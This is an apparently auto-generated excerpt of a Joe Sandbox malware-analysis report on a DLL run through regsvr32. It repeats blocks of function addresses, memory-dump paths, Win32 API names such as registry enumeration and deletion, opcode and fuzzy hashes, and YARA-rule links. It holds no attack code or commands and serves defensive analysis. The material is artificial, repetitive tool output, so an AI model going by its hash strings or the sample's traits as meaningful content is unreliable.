                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreate$Open
                                                                                                                                                                                    • String ID: software
                                                                                                                                                                                    • API String ID: 1740278721-2010147023
                                                                                                                                                                                    • Opcode ID: 026de6d3dabde66a7284c77aefd9f3685b75e7f7ab408ad583b1c2c2cf688818
                                                                                                                                                                                    • Instruction ID: 444d633d9187978a12a0fa75b982214a58ef8caa87376705657d4a0c6fc2483b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 026de6d3dabde66a7284c77aefd9f3685b75e7f7ab408ad583b1c2c2cf688818
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A217F76215B8486EBA18B50E084B9A73A4F79C7D9F509215EA8D07B58DF7CC28CCB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001AF58 Relevance: 10.5, APIs: 7, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MetricsSystem$CapsDevice
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4163108049-0
                                                                                                                                                                                    • Opcode ID: d752bd71947f282ea93a2ee621bf6cf5e84ce030729ab8c7d58ed3bf0a16cd52
                                                                                                                                                                                    • Instruction ID: 8fd946fc15118f12ad27ed37d6484ced67352ca24f295e30966117a639810bd0
                                                                                                                                                                                    • Opcode Fuzzy Hash: d752bd71947f282ea93a2ee621bf6cf5e84ce030729ab8c7d58ed3bf0a16cd52
                                                                                                                                                                                    • Instruction Fuzzy Hash: B801DA71A00A488BE7869F62E95839A73A1F74C7D2F11C439EB5A87750DF3C85598B04
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001AEE4 Relevance: 10.5, APIs: 7, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$Brush
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2798902688-0
                                                                                                                                                                                    • Opcode ID: 18eeb132bac237a1294618d5aa15b2339296e4a329d5ccadde4d3f6957de983e
                                                                                                                                                                                    • Instruction ID: b999b25cf13381f3060bd8ace5867cc69c76ca22164369b16d0babe83c9499b0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18eeb132bac237a1294618d5aa15b2339296e4a329d5ccadde4d3f6957de983e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F03A75900B0ACBE79A5FB0E4583EA3776F74CB86F055028DA0607394EF3D8599C780
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180015398 Relevance: 9.1, APIs: 6, Instructions: 114threadwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Enable$ParentProcess$ActiveCurrentEnabledFileLastLongMessageModuleNamePopupSendThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1819874647-0
                                                                                                                                                                                    • Opcode ID: dd76a1e0fe300af98cd5c98082d7fd3ae09e6031c961fd41811a08b5e2ee2536
                                                                                                                                                                                    • Instruction ID: fec9ee7dc3b768c015497362c1b1f96467f6d852583e54493d31c8a435687f38
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd76a1e0fe300af98cd5c98082d7fd3ae09e6031c961fd41811a08b5e2ee2536
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1941E43620498887E7F25B25E4117DB6790F78C7DFF488111BA8A4BB85DF7CC6888700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001528C Relevance: 9.1, APIs: 6, Instructions: 80COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 670545878-0
                                                                                                                                                                                    • Opcode ID: bfe6091dfb9970da829bf1f5eb4104c1db9e7eb8b03aa8dbcf1ee566a42d294b
                                                                                                                                                                                    • Instruction ID: b2ee5342cce6e9884ecb1e69a68a3423dcca351c17ab9e8f1c4f652b6b4c67b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: bfe6091dfb9970da829bf1f5eb4104c1db9e7eb8b03aa8dbcf1ee566a42d294b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F312B31205E49C2EFDB9B56A5503E962A0AB5DBC2F1CC534FE9A0B785EF78C6088300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002AFD4 Relevance: 9.1, APIs: 6, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2210154019-0
                                                                                                                                                                                    • Opcode ID: b34d10246a834ae36c9699356d58b6084fdef1ec799a6c442e7d379ee08ec199
                                                                                                                                                                                    • Instruction ID: 5a68c21d2beea6716c550d6677df53c04d32664e6f0fec96d344ba95286d9390
                                                                                                                                                                                    • Opcode Fuzzy Hash: b34d10246a834ae36c9699356d58b6084fdef1ec799a6c442e7d379ee08ec199
                                                                                                                                                                                    • Instruction Fuzzy Hash: A1315C71214A4982EBA38B10E4853D663A0F78D7B9F509305F679879E4DF7DC68CCB40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180023378 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018,000000018000B780), ref: 0000000180023382
                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018,000000018000B780), ref: 0000000180023390
                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018,000000018000B780), ref: 00000001800233E8
                                                                                                                                                                                      • Part of subcall function 0000000180024C8C: Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018,000000018000B780), ref: 00000001800233BC
                                                                                                                                                                                    • free.LIBCMT ref: 00000001800233DF
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00000001800233D0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3106088686-0
                                                                                                                                                                                    • Opcode ID: d48366c53854f49b5300689aa5fef707030d8cb3908e49b58aacd46522e5a323
                                                                                                                                                                                    • Instruction ID: 88143b9947d995fd135afd6007bdf7e006f29d4c93c5755c8297014baae904ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: d48366c53854f49b5300689aa5fef707030d8cb3908e49b58aacd46522e5a323
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E012C35206B4986EBC7AB65A4853E963A1AB4CBE1F19C224B925463D1EF3CC74C8310
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001BBBC Relevance: 9.0, APIs: 6, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1315500227-0
                                                                                                                                                                                    • Opcode ID: 90e17716f0abe8ade5e61042a129ede90a5ec6d8601d3546d10bb0d774a64d29
                                                                                                                                                                                    • Instruction ID: 3f72a0a5fd1a10b8851e0b294ca67786da271e34aa2ccdda793f3f55451a433b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e17716f0abe8ade5e61042a129ede90a5ec6d8601d3546d10bb0d774a64d29
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B016235214B0D82EB968B15E8043EB53A5F78DBC6F98C530ED5A867A8DF3CC64D8740
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180018CF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnumOpenQueryValue
                                                                                                                                                                                    • String ID: Software\
                                                                                                                                                                                    • API String ID: 3984146545-964853688
                                                                                                                                                                                    • Opcode ID: 12bd0fc1200f519c0c9bd1d1f87c11f9a6b9b5ec8aa2a9f1296bf3a4ffe37874
                                                                                                                                                                                    • Instruction ID: fb556d810cef59515e6927380514bd390ba9bf4498066304b8987e3789019bc8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12bd0fc1200f519c0c9bd1d1f87c11f9a6b9b5ec8aa2a9f1296bf3a4ffe37874
                                                                                                                                                                                    • Instruction Fuzzy Hash: 63519672315E8982EB91DB25E4407DA63A1FB89BE4F448221FA69476D9DF78C648C700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180018B38 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseDeleteEnumOpen
                                                                                                                                                                                    • String ID: Software\Classes\
                                                                                                                                                                                    • API String ID: 4142876296-1121929649
                                                                                                                                                                                    • Opcode ID: e03c1683f02b7bd1af60361353448972f516862f437fb5ae21698e9b4f9ee093
                                                                                                                                                                                    • Instruction ID: 40f783a4a5deab79eb5e9286dcc9650f64df3800fe8ed7aceb70ffdbda519f36
                                                                                                                                                                                    • Opcode Fuzzy Hash: e03c1683f02b7bd1af60361353448972f516862f437fb5ae21698e9b4f9ee093
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B415272615E4882EB919B29D48439A63A0FB8CBF4F508312FA6D437E5DF78C649C740
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000F57C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 2178440468-2766056989
                                                                                                                                                                                    • Opcode ID: 83d5d067d9ed3c24426d95f86332b9de76371c07ce62199a27b7163ddd8c0bef
                                                                                                                                                                                    • Instruction ID: ef4282b44336dc17b9c21bbd474908c86e28ef90974653bfc591dfdae05196a0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83d5d067d9ed3c24426d95f86332b9de76371c07ce62199a27b7163ddd8c0bef
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C411D32201E4886EBA6DF65D5443ED37A0FB8CBD5F188125EB0947BA5DF39C6A8C341
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180019368 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Edit
                                                                                                                                                                                    • API String ID: 0-554135844
                                                                                                                                                                                    • Opcode ID: 7e901d5db3268a1167f35996f1253c801ca61453d66c525f1a32a04eb0a09be1
                                                                                                                                                                                    • Instruction ID: ad190c3700badcd3eaa6ab0c33279c1c69684ad1269fe22038a605ac64dac38d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e901d5db3268a1167f35996f1253c801ca61453d66c525f1a32a04eb0a09be1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 85212E31201E0986FBE69B61E5557E92391B78CBC4F18D025FA15876D9DF28CA498341
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002A548 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1012874770-0
                                                                                                                                                                                    • Opcode ID: b87b6e23f46ed097ced82e0a9d69a6d802008f7b66e4ed65d5f6623e8fbf2146
                                                                                                                                                                                    • Instruction ID: 8d435dccea0753d52150c9128cadf13fa0d24858d4c7be481841f1439a804799
                                                                                                                                                                                    • Opcode Fuzzy Hash: b87b6e23f46ed097ced82e0a9d69a6d802008f7b66e4ed65d5f6623e8fbf2146
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A01D772205D1892FAD3EB61D4923EA2365A78CBC8F559002F50E87592CF24DB8883A1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002378C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                    • String ID: MOC$csm
                                                                                                                                                                                    • API String ID: 3186804695-1389381023
                                                                                                                                                                                    • Opcode ID: 610fa95a075f196162efb4596cab28712756bce36c360406ab7c7507d520a257
                                                                                                                                                                                    • Instruction ID: 52a6fd04935734c33c081de4f9bd1901027a51008cb903e06116fae61730c0bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 610fa95a075f196162efb4596cab28712756bce36c360406ab7c7507d520a257
                                                                                                                                                                                    • Instruction Fuzzy Hash: C5E04F76944108C6EBA7BB6180073EC37A0F75CB86FC6D461B24442782CFBC878C8B12
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180019928 Relevance: 7.7, APIs: 5, Instructions: 165COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$CreateDestroyDialogIndirectLockParamUnlockWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 118996721-0
                                                                                                                                                                                    • Opcode ID: 64a4bef3045a19651f62699f8f7f6b06069dda067427d7ee80e2164b89d45d07
